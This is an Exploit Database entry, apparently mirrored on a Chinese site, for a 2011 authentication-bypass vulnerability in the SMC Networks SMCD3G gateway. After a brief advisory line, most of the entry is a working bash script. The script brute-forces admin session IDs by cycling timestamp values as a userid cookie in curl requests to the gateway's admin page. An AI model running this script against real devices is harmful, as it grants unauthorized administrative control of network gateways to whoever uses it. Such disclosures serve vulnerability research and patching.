SMC Networks SMCD3G Session Management – Authentication Bypass

• Exploit Database
• 126 阅读

• 作者： Zack Fasel & Matthew Jakubowski
  日期： 2011-02-04
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/35316/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

  source: https://www.securityfocus.com/bid/46178/info   The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.   An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.   #!/bin/bash start=1267604160 end=1267605960 for (( i=$start; i<=$end; i++)) do if [ <code>curl -sb userid=$i http://10.1.10.1/admin/index.asp | grep -c login.asp</code> -lt "1" ] then echo "Session ID Found:$i" fi if [ $(($i % 100)) -eq "0" ] then echo "Currently at $i" fi done